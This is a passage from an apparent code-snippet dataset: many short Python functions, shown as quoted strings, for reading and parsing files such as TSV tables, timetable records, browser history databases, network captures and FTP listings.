open(filename,'r') as f:\n header = None\n\n for l in f:\n record_type = l[:2]\n\n if record_type == \"HD\":\n # Header\n d = {}\n d[\"user_identity\"] = l[7:13]\n d[\"user_date\"] = date_yymmdd(l[16:22])\n d[\"extracted_time\"] = datetime_ddmmyyhhmm(l[22:32])\n d[\"current_reference\"] = l[32:39].strip()\n d[\"previous_reference\"] = l[39:46].strip()\n d[\"full\"] = (l[46] == 'F')\n d[\"version\"] = l[47]\n d[\"extract_start\"] = date_ddmmyy(l[48:54])\n d[\"extract_end\"] = date_ddmmyy(l[54:60])\n if header is not None:\n warn(\"Two header fields: overwriting the first\", WeirdBehaviour)\n header = d\n\n elif record_type == \"BS\":\n # basic schedule\n d = {}\n d[\"type\"] = transaction_types[l[2]]\n d[\"uid\"] = l[3:9]\n d[\"date_runs_from\"] = date_yymmdd(l[9:15])\n if l[15:21] == \"999999\":\n d[\"date_runs_to\"] = None\n else:\n d[\"date_runs_to\"] = date_yymmdd(l[15:21])\n\n d[\"days_run\"] = dict(zip(days,(c == \"1\" for c in l[21:28])))\n\n bhx = l[28].strip()\n if bhx:\n d[\"bank_holiday_running\"] = bhx\n if bhx not in Timetable.bhx:\n warn(\"bank holiday running code = %r\"%(bhx,),UnrecognisedWarning)\n\n status = l[29].strip()\n if status:\n d[\"train_status\"] = status\n if status not in Timetable.status:\n warn(\"status = %r\"%(status,),UnrecognisedWarning)\n\n category = l[30:32].strip()\n if category:\n d[\"category\"] = category\n if category not in Timetable.category:\n warn(\"category = %r\"%(category,),UnrecognisedWarning)\n\n d[\"train_identity\"] = l[32:36].strip()\n d[\"headcode\"] = l[36:40]\n d[\"train_service_code\"] = l[41:49]\n d[\"portion_id\"] = l[49]\n\n power_type = l[50:53].strip()\n if power_type:\n d[\"power_type\"] = power_type\n if power_type not in Timetable.power_type:\n warn(\"power_type = %r\"%(power_type,),UnrecognisedWarning)\n d[\"timing_load\"] = l[53:57].strip() # should validate this\n\n d[\"speed\"] = int(l[57:60].strip() or 0)\n\n operating_chars = list(l[60:66].strip())\n d[\"operating_chars\"] = operating_chars\n for c in operating_chars:\n if c not in Timetable.operating_chars:\n warn(\"operating_chars has %r\"%(c,),UnrecognisedWarning)\n\n train_class = l[66].strip() or \"B\"\n d[\"train_class\"] = train_class\n if train_class not in Timetable.train_class:\n warn(\"train_class = %r\"%(train_class,),UnrecognisedWarning) \n sleepers = l[67].strip()\n if sleepers:\n d[\"sleepers\"] = sleepers\n if sleepers not in Timetable.sleepers:\n warn(\"sleepers = %r\"%(sleepers,),UnrecognisedWarning)\n\n reservations = l[68].strip()\n if reservations:\n d[\"reservations\"] = reservations\n if reservations not in Timetable.reservations:\n warn(\"reservations = %r\"%(sleepers,),UnrecognisedWarning)\n\n catering = list(l[69:73].strip())\n d[\"catering\"] = catering\n for c in catering:\n if c not in Timetable.catering:\n warn(\"catering has %r\"%(c,),UnrecognisedWarning)\n\n service_branding = list(l[73:77].strip())\n d[\"service_branding\"] = service_branding\n for c in service_branding:\n if c not in Timetable.service_branding:\n warn(\"service_branding has %r\"%(c,),UnrecognisedWarning)\n\n\n else:\n warn(\"record type %r\"%(record_type,), UnsupportedWarning)\n # warn(\"record type %r\"%(record_type,), UnrecognisedWarning)", "def parse_file(file):\n for line in open(file,'r'):\n line = line.strip()\n token = line.split('\\t')\n ### loop through ids in second column and print with first columns \n for item in token[1].split(','):\n print item+'\\t'+token[0]", "def load_data(filename):\n hkas = HKArchiveScanner()\n hkas.process_file(filename)\n cat = hkas.finalize()\n fields, timelines = cat.get_data(['position'], short_match=True)\n return fields, timelines", "def read_tab_delim_file(fname):\n file_paths = []\n with open(fname, 'r') as f:\n # next(f) # skip headings\n reader = csv.reader(f, delimiter='\\t')\n for path in reader:\n file_paths.append(path)\n return file_paths", "def import_files_table(path):\n return pd.read_csv(path, sep=\"\\t\", skiprows=1, header=0)", "def _read_tsv(cls, input_file, quotechar='\"'):\n with tf.gfile.Open(input_file, \"r\") as f:\n reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar)\n lines = []\n for line in reader:\n lines.append(line)\n return lines", "def _readin_chrome_history(file):\n\tcon = lite.connect(file)\n\tcontent = []\n\twith con:\n\t\tcur = con.cursor()\n\t\tcur.execute(\"SELECT visits.id, urls.url, datetime(visits.visit_time / 1000000 + (strftime('%s', '1601-01-01')), 'unixepoch'), * FROM urls, visits WHERE urls.id = visits.url;\")\n\t\trows = cur.fetchall()\n\t\tsources = []\n\t\tfor row in rows:\n\t\t\t_print_progress(rows.index(row))\n\t\t\tdate = datetime.datetime.strptime(row[2],\"%Y-%m-%d %H:%M:%S\")\n\t\t\tsource = ''\n\t\t\tpattern = re.compile(r'.*(www\\.|http[s]{0,1}:\\/\\/)([^\\.]+)\\..*')\n\t\t\tm = pattern.match(row[1])\n\t\t\tif m:\n\t\t\t\tsource = m.group(2)\n\t\t\t\tif not source in sources:\n\t\t\t\t\tsources.append(source)\n\t\t\tcontent.append(logfile_entry(row[0], file, row[1], row[3:], date, '', source))\n\t_delete_print()\n\treturn logfile(file, len(content), 'firefox_sqlite', content, sources)", "def open_txt_table(txt_file, data_start_with=2,keys_line=0, types_line=1, split_char=\"\\t\"):\n file = open(txt_file,\"r\")\n i = 0;\n line = file.readline()\n keys = []\n types = []\n txt_table_rows = []\n while line != \"\":\n line = line.strip(\"\\n\")\n line = line.strip(\"\\r\")\n if(i >= data_start_with):\n values = line.split(split_char)\n n = len(values)\n values += [\" \" for x in range(len(keys) - n)]\n txt_table_rows.append(\n TxtTableRow(keys, values, types)\n )\n elif(i==keys_line):\n keys = line.split(split_char)\n elif(i == types_line):\n types = line.split(split_char)\n i += 1\n line = file.readline()\n\n file.close()\n return txt_table_rows", "def table_tags(filen):\n\n print(\"Scanning file \" + str(filen))\n rtable = re.compile(r\"\\$TABLE *:\")\n f = open(filen, \"r\")\n linecount = 0\n tablecount = 0\n tablelist = []\n for line in f:\n linecount = linecount + 1\n table = rtable.search(line)\n if table:\n tablecount = tablecount + 1\n print(str(linecount) + \": \" + str(line.rstrip(\"\\n\")))\n tablelist.append(line.rstrip(\"\\n\"))\n f.close()\n print(str(linecount) + \" lines and \" + str(tablecount) + \" tables\")\n return tablelist", "def _read_tsv(cls, input_file, quotechar=None):\n with tf.gfile.Open(input_file,\"r\") as f:\n reader = csv.reader(f,delimiter=\"\\t\", quotechar=quotechar)\n lines = []\n for line in reader:\n lines.append(line)\n return lines", "def _read_tsv(cls, input_file, quotechar=None):\n with tf.gfile.Open(input_file, \"r\") as f:\n reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar)\n lines = []\n for line in reader:\n lines.append(line)\n return lines", "def parse_file(filename='activity_1321393768.tcx'):\n\n # tree = etree.parse(filename)\n tree = getattr(etree, 'parse')(filename)\n xmlstr = '{http://www.garmin.com/xmlschemas/TrainingCenterDatabase/v2}'\n points = tree.findall('//'+xmlstr+'Trackpoint')\n # dist = [r.find(xmlstr+'DistanceMeters').text for r in points]\n heart = [int(r.find(xmlstr+'HeartRateBpm')[0].text) for r in points]\n speed = [float(r.find(xmlstr+'Extensions')[0][0].text) for r in points]\n pace = [float(curr)*3600/1000 for curr in speed]\n time = range(0, len(speed))\n return (time, heart, pace)", "def parse():\n values = []\n for file in os.listdir('/tmp/street_data/'): \n with open('/tmp/street_data/' + file, 'r') as f:\n data = f.readlines()\n data = ''.join(data)\n soup = BeautifulSoup(data)\n tables = soup.findAll('table') \n for table in tables:\n print(table)\n time = table.find('eventtime')\n lat = table.find('latitude')\n long = table.find('longitude')\n values.append({'lat': lat, 'long': long, 'time': time})\n print(lat,long,time)\n return values", "def read_tsv(path):\n return pd.read_csv(path, sep=\"\\t\", index_col=0)", "def readFileTable(f, header):\n version, dataOffset, archiveFileCount, fileTableLength, endianness, fileCount = header\n \n def readFileRecords(f):\n for i in range(fileCount):\n recordBytes = f.read(FILE_RECORD_LENGTH)\n path, offset, size, endianness, archiveFileIndex = struct.unpack(\"<256sLLLL\", recordBytes)\n path, _ = path.decode('ascii').split(\"\\0\", 1)\n yield (path, offset, size, endianness, archiveFileIndex)\n \n return list(readFileRecords(f))", "def read_changes_tsv(tsv_file):\r\n changes = {}\r\n with open(tsv_file, 'r') as info_file:\r\n for info in info_file:\r\n split_info = info.strip().split('/t')\r\n changes[split_info[0]] = split_info[1]\r\n return changes", "def read_traffic(filename, fields=[], display_filter=\"\", \n timeseries=False, strict=False):\n if timeseries:\n fields = [\"frame.time_epoch\"] + fields\n fieldspec = \" \".join(\"-e %s\" % f for f in fields)\n\n display_filters = fields if strict else []\n if display_filter:\n display_filters.append(display_filters)\n filterspec = \"-Y '%s'\" % \" and \".join(f for f in display_filters)\n\n options = \"-r %s -n -T fields -Eheader=y\" % filename\n cmd = \"tshark %s %s %s\" % (options, filterspec, fieldspec)\n print (cmd)\n proc = subprocess.Popen(cmd, shell = True, \n stdout=subprocess.PIPE)\n if timeseries:\n df = pd.read_table(proc.stdout, \n index_col = \"frame.time_epoch\", \n parse_dates=True, \n date_parser=mydateparser)\n else:\n df = pd.read_table(proc.stdout)\n \n return df", "def file_info(self, f):\n ld8 = self.ld8_extract(f) # get luna_date\n sid = self.sesid(ld8) # make luna_visitnum\n age = self.age_lookup.get(sid)\n return (sid, age)", "def load_timestamps(ts_file):\n ts = []\n with open(ts_file, 'r') as f:\n for line in f.readlines():\n line = line.split()\n if line[0] != \"#\":\n ts.append(line)\n\n return ts", "def find_timespan(f):\n open_file = pd.read_csv(f)\n return int(open_file.keys()[0]), int(open_file.keys()[-1])", "def download_table(filepath: Path, url: str, get_time=False):\n if not filepath.exists():\n if url.lower().endswith('zip'):\n import zipfile, requests, io\n table_request = requests.get(url).content\n zip_file = zipfile.ZipFile(io.BytesIO(table_request))\n zip_file.extractall(filepath)\n elif 'xls' in url.lower() or url.lower().endswith('excel'):\n import shutil\n try:\n with urllib.request.urlopen(url) as response, open(filepath, 'wb') as out_file:\n shutil.copyfileobj(response, out_file)\n except urllib.error.HTTPError:\n log.warning(f'Error downloading {url}')\n elif 'json' in url.lower():\n pd.read_json(url).to_csv(filepath, index=False)\n if get_time:\n try:\n retrieval_time = filepath.stat().st_ctime\n except OSError:\n retrieval_time = time.time()\n return time.ctime(retrieval_time)\n elif get_time:\n return time.ctime(filepath.stat().st_ctime)", "def read_frame_trajectory_file( filename ):\n file = open(filename, \"r\")\n\n timestamps = list()\n path = list()\n\n for line in file:\n # eliminate leading spaces\n line = line.strip()\n\n # ignore comments and empty lines\n if len(line) == 0 or line[0] == '#':\n continue\n\n # divide on whitespace and convert to numbers\n nums = [float(x) for x in line.split()]\n \n # separate out components and build lists\n\n timestamps.append( nums[0] )\n\n origin = list( nums[1:4] )\n unitx = list( nums[4:7] )\n unity = list( nums[7:10] )\n unitz = list( nums[10:13] )\n\n path.append( list( (origin, unitx, unity, unitz ) ) )\n\n return path, timestamps", "def __openRow(fd):\n\n print(\" <tr>\", file=fd)", "def getLineListing(line_list_url = LINE_LIST_URL, line_list_re = LINE_LIST_RE, base_url = BASE_URL):\n line_list_re = re.compile('<tr.+?<td.+?<a\\shref=\\\"(Sched/\\S+?)\\\".+?<b>(.+?)</b>.+?size=.*?\\\"1\\\">(.+?)</font>.+?size=\\\"2\\\">(.+?)</font>')\n \n html_data = urllib2.urlopen(line_list_url).read().replace('\\n','').replace('\\t','').replace('\\r','') #get rid of unecessary whitespace\n while html_data.find(' ') > -1:\n html_data = html_data.replace(' ', ' ') #HTML doesn't care about multiple spaces, we do\n return data = line_list_re.findall(html_data)", "def parse_line(self, line, time_shift=0.0):\n # The local variables are rather simple.\n # pylint: disable=too-many-locals\n try:\n (\n mode_string,\n nlink,\n user,\n group,\n size,\n month,\n day,\n year_or_time,\n name,\n ) = self._split_line(line)\n # We can get a `ValueError` here if the name is blank (see ticket #69).\n # This is a strange use case, but at least we should raise the\n # exception the docstring mentions.\n except ValueError as exc:\n raise ftputil.error.ParserError(str(exc))\n # st_mode\n st_mode = self.parse_unix_mode(mode_string)\n # st_ino, st_dev, st_nlink, st_uid, st_gid, st_size, st_atime\n st_ino = None\n st_dev = None\n st_nlink = int(nlink)\n st_uid = user\n st_gid = group\n st_size = int(size)\n st_atime = None\n # st_mtime\n st_mtime, st_mtime_precision = self.parse_unix_time(\n month, day, year_or_time, time_shift, with_precision=True\n )\n # st_ctime\n st_ctime = None\n # st_name\n if name.count(\" -> \") > 1:\n # If we have more than one arrow we can't tell where the link name\n # ends and the target name starts.\n raise ftputil.error.ParserError(\n '''name '{}' contains more than one \"->\"'''.format(name)\n )\n elif name.count(\" -> \") == 1:\n st_name, st_target = name.split(\" -> \")\n else:\n st_name, st_target = name, None\n stat_result = StatResult(\n (\n st_mode,\n st_ino,\n st_dev,\n st_nlink,\n st_uid,\n st_gid,\n st_size,\n st_atime,\n st_mtime,\n st_ctime,\n )\n )\n # These attributes are kind of \"half-official\". I'm not sure whether\n # they should be used by ftputil client code.\n # pylint: disable=protected-access\n stat_result._st_mtime_precision = st_mtime_precision\n stat_result._st_name = st_name\n stat_result._st_target = st_target\n return stat_result", "def import_table(path_or_reference, get_time=False):\n try:\n df = pd.read_csv(path_or_reference, low_memory=False)\n except urllib.error.URLError as exception:\n log.warning(exception.reason)\n log.info('retrying url...')\n time.sleep(3)\n df = pd.read_csv(path_or_reference, low_memory=False)\n if get_time and isinstance(path_or_reference, Path):\n retrieval_time = path_or_reference.stat().st_ctime\n return df, time.ctime(retrieval_time)\n elif get_time:\n retrieval_time = time.time()\n return df, time.ctime(retrieval_time)\n return df", "def readTxt(path2file, verbose = True):\n\n if (verbose):\n\t print('Parsing file ', path2file)\n\n ret = pd.read_csv(path2file, sep=';', header = None, names = ['Received', 'ExchTime', 'OrderId', 'Price', 'Amount',\n 'AmountRest', 'DealId', 'DealPrice', 'OI', 'Flags'], skiprows = 3, parse_dates = ['Received', 'ExchTime'], \n date_parser = lambda x: datetime.strptime(x, '%d.%m.%Y %H:%M:%S.%f'),\n converters = {'OrderId': int, 'Price': int, 'Amount': int,'AmountRest': int, 'DealId': int, 'DealPrice': int, 'OI': int, 'Flags': str})\n\n if (verbose):\n print('Finished parsing ', path2file)\n\n return ret", "def get_info(info_filename):\n with open(info_filename) as info_file:\n info_dict = csv.DictReader(info_file)\n info = {}\n for row in info_dict:\n info[row['path']] = datetime.datetime.strptime(row['start'],\n '%Y-%m-%d')\n return info", "def _read_tsv(cls, input_file, quotechar=None):\n with open(input_file, \"r\", encoding='utf-8') as f:\n reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar)\n lines = []\n for line in reader:\n lines.append(line)\n return lines", "def load_links(self) -> Tuple[List[str], List[str]]:\n\n with open(URL_FILE, 'r') as txt_file:\n lines = txt_file.read().split()\n\n urls = []\n for line in lines:\n urls.append(line.split(',')[0])\n \n return lines, urls", "def parse_data_from_file(path):\n print(path.stem)\n \n raw = path.stem.split('-')\n\n rawdate = raw[0][2:]\n print(rawdate)\n date = rawdate[6:] + \"/\" + rawdate[4:6] + '/' + rawdate[0:4]\n rawtime = raw[1]\n time = rawtime[0:2] + \"h\" + rawtime[2:4] + \"m\" + rawtime[4:6] + \"s\"\n dt = datetime.strptime(rawdate+rawtime, '%Y%m%d%H%M%S')\n print(dt)\n return dt", "def parse_file(filepath):\n\n #number_pattern = '(\\d+(?:\\.\\d+)?)'\n #number_pattern = '(\\d+(?:\\.\\d+)?)\\s+(\\d+(?:\\.\\d+)?)\\s+[|k]?'\n #line_pattern = '^\\s*%s\\.*hr.*min.*$' % ('\\s+'.join([number_pattern for x in range(5)]))\n\n line_pattern = r'^\\s*(\\d+(?:\\.\\d+)?)\\s+(\\d+(?:\\.\\d+)?)\\s+[|k]?\\s+(\\d+(?:\\.\\d+)?)\\s+(\\d+(?:\\.\\d+)?)\\s+[|k]?\\s+(\\d+(?:\\.\\d+)?)\\s+(\\d+(?:\\.\\d+)?)\\s+[|k]?\\s+(\\d+(?:\\.\\d+)?)\\s+(\\d+(?:\\.\\d+)?)\\s+[|k]?\\s+(\\d+(?:\\.\\d+)?)\\s+(\\d+(?:\\.\\d+)?)\\s+[|k]?\\s+.*hr.*min.*$'\n\n data = [] # create an empty list to collect the data\n # open the file and read through it line by line\n with open(filepath, 'r') as file_object:\n line = file_object.readline()\n while line:\n #print(\"line: \", line)\n match = re.match(line_pattern, line)\n if match:\n #print(\"match line: \", line)\n #print(match.groups())\n row = {\n 'l_rate': match.group(1),\n 'iter': match.group(2),\n 'epoch': match.group(3),\n 'num': match.group(4),\n 'valid_loss': match.group(5),\n 'valid_acc': match.group(6),\n 'train_loss': match.group(7),\n 'train_acc': match.group(8),\n 'batch_loss': match.group(9),\n 'batch_acc': match.group(10)\n }\n #print(row)\n #return match.groups()\n\n # append the dictionary to the data list\n data.append(row)\n\n line = file_object.readline()\n\n # create a pandas DataFrame from the list of dicts\n print(\"data: \", data)\n df = pd.DataFrame(data)\n print(df.ndim)\n print(df.shape)\n print(df.dtypes)\n print(\"data frame: \", df)\n # set the School, Grade, and Student number as the index\n #df.set_index(['epoch', 'valid_loss', 'valid_acc', 'train_loss', 'train_acc'], inplace=True)\n #df.set_index(['epoch'], inplace=True)\n # consolidate df to remove nans\n #df = df.groupby(level=data.index.epoch).first()\n # upgrade Score from float to integer\n df = df.apply(pd.to_numeric, errors='ignore')\n return df", "def open_tsv(path, multi=False, encoding='utf-8'):\n xx = 0\n DRtn = {}\n for line in file_iter(path, encoding=encoding):\n line = line.strip('\\r\\n')\n LSplit = line.split('\\t')\n \n if xx == 0:\n LKeys = LSplit\n else: \n yy = 0\n DItem = {}\n for key in LKeys:\n DItem[key] = LSplit[yy]\n yy += 1\n \n key = DItem[LKeys[0]]\n if not multi:\n # A single primary key\n assert not key in DRtn, key\n DRtn[key] = DItem\n elif multi == -1:\n # Country codes HACK!\n if key in DRtn: \n continue\n DRtn[key] = DItem\n else: \n # Can have multiple primary keys\n # (e.g. language index info)\n if not key in DRtn: \n DRtn[key] = []\n DRtn[key].append(DItem)\n del DItem[LKeys[0]]\n xx += 1\n return DRtn", "def parse_file_list(self, file_path=None, file_name_id='Producer Granule ID', url_id='Online Access URLs'):\n\n # read in and maintain the raw csv file as df\n df = pd.read_csv(file_path)\n\n # record the number of files\n self.file_num = df.__len__()\n\n # initiate the data frame\n self.file_list = pd.DataFrame()\n self.file_list['download_dir'] = np.NaN\n self.file_list['file_name'] = df[file_name_id]\n self.file_list['online_url'] = df[url_id]\n self.file_list['status'] = 0\n self.file_list['year'] = 0\n self.file_list['day'] = 0\n self.file_list = self.file_list.reset_index(drop=True)\n\n # clean up the variables for a file list downloaded from Reverb\n # extract http urls from the file list\n print(\"Extracting http urls from the file list...\")\n self.file_list['online_url'] = self.file_list['online_url'].str.rstrip(\"\\'\").str.split(',').str[1]\n self.file_list['year'] = self.file_list['online_url'].str.split('/', expand=True).iloc[:, 7]\n self.file_list['day'] = self.file_list['online_url'].str.split('/', expand=True).iloc[:, 8]\n self.file_list['download_dir'] = self.download_dir + self.file_list['year'] + '/' + self.file_list['day'] + '/'", "def readBookmarkFromFile(bmPathName):\n outlines = []\n lastTabNum = 0\n r = re.compile(r'\\s*(.*)\\s+(\\d+\\.*\\d*)\\s*')\n r2 = re.compile(r'\\s*\\S.*')\n lines=codecs.open(bmPathName,mode='r',encoding='utf-16').readlines()\n # print('lines:',lines)\n for line in lines:\n line=line.encode('utf-8')\n # print('line:',line)\n if not r2.match(line): # line contain only white spaces\n continue\n matchObj = r.match(line)\n if not matchObj:\n print ('bookmark file format error in: ' + line)\n sys.exit(0)\n tabNum = matchObj.start(1)\n bmTitle = matchObj.group(1)\n pageRatio = float(matchObj.group(2)) - 1\n bmPage = int(pageRatio)\n bmRatio = pageRatio - bmPage\n outline = {}\n outline['/Title'] = bmTitle\n outline['/Ratio'] = pageRatio\n tempOutlines = outlines\n if tabNum > lastTabNum + 1:\n print ('bookmark file format error in: ' + line)\n sys.exit(0)\n elif tabNum == lastTabNum + 1:\n for i in range(0, tabNum - 1):\n tempOutlines = tempOutlines[-1]\n tempOutlines.append([outline])\n else:\n for i in range(0, tabNum):\n tempOutlines = tempOutlines[-1]\n tempOutlines.append(outline)\n lastTabNum = tabNum\n return outlines", "def _read_tsv(cls, input_file, quotechar=None):\r\n with open(input_file, \"r\", encoding=\"utf-8\") as f:\r\n return list(csv.reader(f, delimiter=\"\\t\", quotechar=quotechar))", "def readfile(self,filenm,delimiter):\n\n timefiledata = []\n timefileextra = {}\n fixtimeflag = False\n hour0=hour1=False\n\n\n if isinstance(filenm,(str,unicode)):\n timeobject = readTextFile(filenm,delimiter)\n else:\n timeobject = filenm\n\n\n for idx,lines in enumerate(timeobject):\n\n try:\n floatlines = map(float,lines)\n month,date,hour = floatlines[:3]\n dataval = floatlines[3:]\n ##Code to check if the first time value is 1.0. If so subtract every hour by 0.5\n\n if not hour1 or hour0:\n hour1 = hour\n if hour0==1.0 and hour1==2.0:\n #Go back to the array that stores timevalues and fix the hour and time stamp\n timefiledata[0]['h']=0.5\n timefiledata[0]['tstamp']=timeStamp(1,1,0.5)\n fixtimeflag=True\n\n if not hour0:\n hour0 = hour\n\n if fixtimeflag:\n hour = hour-0.5\n ##Code to check if the first time value is 1.0. If so subtract every hour by 0.5\n\n timestamp = timeStamp(month,date,hour)\n\n timefiledata.append({\"m\":month,\"d\":date,\"h\":hour,\"readStadicData\":dataval,\"tstamp\":timestamp})\n\n except ValueError:\n print(sys.exc_info())\n timefileextra[lines[0]]=lines[1]\n\n return (timefiledata,timefileextra)", "def _read_tsv(cls, input_file, quotechar=None):\r\n with open(input_file, \"r\", encoding='utf-8') as f:\r\n reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar)\r\n lines = []\r\n for line in reader:\r\n lines.append(line)\r\n return lines", "def _read_tab(pth):\n if not os.path.exists(pth):\n raise SampleTableFileException(\n \"File does not exist: {}\".format(pth))\n read_csv_kwargs = {\"engine\": \"python\", \"dtype\": str,\n \"index_col\": False, \"keep_default_na\": False,\n \"na_values\": [\"\"]}\n return pd.read_csv(pth, sep=infer_delimiter(pth), **read_csv_kwargs)", "def _read_tsv(cls, input_file, quotechar=None):\n with open(input_file, \"r\", encoding='utf-8') as f:\n # reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar)\n lines = []\n for line in f.readlines():\n # if sys.version_info[0] == 2:\n # line = list(cell.decode('utf-8') for cell in line)\n lines.append(line.strip().split('\\t'))\n return lines", "def _read_tsv(cls, input_file, quotechar=None):\r\n with open(input_file, \"r\", encoding=\"utf-8\") as f:\r\n reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar)\r\n lines = []\r\n for line in reader:\r\n lines.append(line)\r\n return lines", "def seperate_file(file):\n firstHalf = file.split(\"\\\\\"[-1])\n #print \"This is the node\", firstHalf[-2]\n node = firstHalf[-2]\n print \"\\nReading results for \", node\n return node", "def get_file(file_to_edit):\n events = []\n file_path = lrs_path + file_to_edit\n with open(file_path, \"r\") as the_file:\n filereader = csv.reader(the_file)\n for row in filereader:\n events.append(row)\n the_file.close()\n return events", "def readTotitle(fh):\n preLines = []\n while True:\n l = fh.readline().strip()\n if l.startswith('>'):\n return (preLines,l)\n elif l == '':\n return preLines,None\n else:\n preLines.append(l)", "def read_tsv_file(input_file, quotechar=None):\n with open(input_file, \"r\", encoding='utf-8') as f:\n reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar)\n x, y = [], []\n for line in reader:\n x.append(line[0])\n y.append(int(line[1]))\n return x, y", "def read_table(cls, filepath_or_buffer, *args, **vargs):\n if filepath_or_buffer.endswith('.csv') and 'sep' not in vargs:\n vargs['sep'] = ','\n df = pandas.read_table(filepath_or_buffer, *args, **vargs)\n labels = df.columns\n return Table([df[label].values for label in labels], labels)", "def _read_tsv(cls, input_file, quotechar=None):\n with open(input_file, \"r\", encoding=\"utf-8-sig\") as f:\n return list(csv.reader(f, delimiter=\"\\t\", quotechar=quotechar))", "def parse_hdob_file(path):\n col_names = [\"obs_time\", \"lat\", \"lon\", \"static_air_press\", \"geo_pot_height\",\n \"sfc_press_dval\", \"t_air\", \"t_dew\", \"wind_dir_spd\", \"wind_peak\",\n \"sfc_wind_peak\", \"rain_rate\", \"qc_flags\"]\n file_header = ''\n obs_data = []\n\n # Determine if 'path' is a path or url\n if isfile(path):\n # open & read local file\n with open(path, 'r') as fh:\n for idx, line in enumerate(fh):\n line = line.rstrip('\\n')\n\n if (idx == 3):\n file_header = line\n elif ((idx > 3) and (idx < 24)):\n curr_line = line.split(' ')\n curr_line = [x for x in curr_line if x != ' ']\n obs_data.append(curr_line)\n hdob_df = pd.DataFrame(data=obs_data, index=range(0, len(obs_data)), columns=col_names)\n hdob_obj = HDOBFile(file_header, hdob_df)\n print(hdob_obj)\n # elif (isURL):", "def _read_tsv(cls, input_file, quotechar=None):\r\n with open(input_file, \"r\", encoding=\"utf-8-sig\") as f:\r\n reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar)\r\n lines = []\r\n for line in reader:\r\n lines.append(line)\r\n return lines", "def get_reference_header(file):\n\n with open(file, \"r\") as typing_report:\n lines = typing_report.readlines()\n return lines[1].split('\\\\t')[3]", "def _read_vtc(vtc_file):\r\n with open(vtc_file, 'rb') as f:\r\n filebytes = f.read()\r\n\r\n hdr = {}\r\n hdr['file_guid'] = hexlify(filebytes[:16])\r\n # not sure about the 4 Bytes inbetween\r\n\r\n i = 20\r\n mpg_file = []\r\n start_time = []\r\n end_time = []\r\n while i < len(filebytes):\r\n mpg_file.append(_make_str(unpack('c' * 261, filebytes[i:i + 261])))\r\n i += 261\r\n Location = filebytes[i:i + 16]\r\n correct = b'\\xff\\xfe\\xf8^\\xfc\\xdc\\xe5D\\x8f\\xae\\x19\\xf5\\xd6\"\\xb6\\xd4'\r\n assert Location == correct\r\n i += 16\r\n start_time.append(_filetime_to_dt(unpack('<q',\r\n filebytes[i:(i + 8)])[0]))\r\n i += 8\r\n end_time.append(_filetime_to_dt(unpack('<q',\r\n filebytes[i:(i + 8)])[0]))\r\n i += 8\r\n\r\n return mpg_file, start_time, end_time", "def parse_tab_outfile(busco):\n with open(busco) as file:\n return file.read().split(\"\\n\")", "def openfile(of_file):\n with open(of_file, 'r') as f:\n return f.readlines()", "def _read_tsv( input_file, quotechar=None):\n with open(input_file, \"r\", encoding=\"utf-8-sig\") as f:\n return list(csv.reader(f, delimiter=\"\\t\", quotechar=quotechar))", "def get_total_link_num(th_object, start, end, filename, path):\n ln = th_object.get_link_nums(start, end, filename)\n prev = \"\"\n with open(path, 'w') as f:\n f.write(\"Time,No_Link\\n\")\n for k, v in ln.items():\n tmp = str(k.time()).split('.')[0]\n if prev != tmp:\n f.write(tmp + \",\" + str(v) + \"\\n\")\n prev = tmp", "def convert_tcr(self):\n\n def read_text(file_name, event_a_id, event_b_id):\n idx_val = {\"span1\": [], \"span2\": [], \"signal\": []}\n parsed_doc = minidom.parse(self.dir_path + \"tcr/TemporalPart/{}\".format(file_name))\n elements = parsed_doc.getElementsByTagName('TEXT')\n text = \"\"\n token_index = 0\n tagxid = {\"EVENT\": \"eid\", \"TIMEX3\": \"tid\"}\n for element in elements:\n if element.tagName == \"TEXT\":\n for item in element.childNodes:\n if item.nodeName == \"#text\":\n text += item.wholeText\n token_index += len(item.wholeText)\n elif item.nodeName == \"EVENT\" or item.nodeName == \"TIMEX3\":\n item_text = ' '.join([child_node.wholeText for child_node in item.childNodes])\n text += item_text\n start_end = [token_index, token_index + len(item_text)]\n token_index += len(item_text)\n\n if item.attributes[tagxid[item.nodeName]].value == event_a_id:\n idx_val[\"span1\"].append(start_end)\n event_a_text = item_text\n elif item.attributes[tagxid[item.nodeName]].value == event_b_id:\n idx_val[\"span2\"].append(start_end)\n event_b_text = item_text\n return text, idx_val, [event_a_text, event_b_text]\n\n mismatch = 0\n data = pd.DataFrame(columns=self.scheme_columns)\n\n test_files = [\"2010.01.08.facebook.bra.color\", \"2010.01.12.haiti.earthquake\", \"2010.01.12.turkey.israel\",\n \"2010.01.13.google.china.exit\", \"2010.01.13.mexico.human.traffic.drug\"]\n\n with open(self.dir_path + \"tcr/CausalPart/allClinks.txt\", 'r') as in_file:\n lines = in_file.readlines()\n\n annotations = [line.strip().split('\\t') for line in lines]\n\n for annotation in annotations:\n file_path = annotation[0] + \".tml\"\n text, idx_val, events_text = read_text(file_path, annotation[1], annotation[2])\n direction = 1 if annotation[3] == \"caused_by\" else 0\n\n split = 2 if annotation[0] in test_files else 1\n\n # saving the sample\n new_row = {\"original_id\": '', \"span1\": [events_text[0]], \"span2\": [events_text[1]], \"signal\": [],\n \"context\": text,\n \"idx\": idx_val, \"label\": 1, \"direction\": direction,\n \"source\": self.namexid[\"tcr\"],\n \"ann_file\": file_path,\n \"split\": split}\n\n if self.check_span_indexes(new_row):\n data = data.append(new_row, ignore_index=True)\n else:\n mismatch += 1\n return data, mismatch", "def open_file_link_manager(file):\n pass", "def fromtab(args):\n p = OptionParser(fromtab.__doc__)\n p.set_sep(sep=None)\n p.add_option(\n \"--noheader\", default=False, action=\"store_true\", help=\"Ignore first line\"\n )\n p.add_option(\"--replace\", help=\"Replace spaces in name to char\")\n opts, args = p.parse_args(args)\n\n if len(args) != 2:\n sys.exit(not p.print_help())\n\n tabfile, fastafile = args\n sep = opts.sep\n replace = opts.replace\n fp = must_open(tabfile)\n fw = must_open(fastafile, \"w\")\n nseq = 0\n if opts.noheader:\n next(fp)\n for row in fp:\n row = row.strip()\n if not row or row[0] == \"#\":\n continue\n\n name, seq = row.rsplit(sep, 1)\n if replace:\n name = name.replace(\" \", replace)\n print(\">{0}\\n{1}\".format(name, seq), file=fw)\n nseq += 1\n fw.close()\n\n 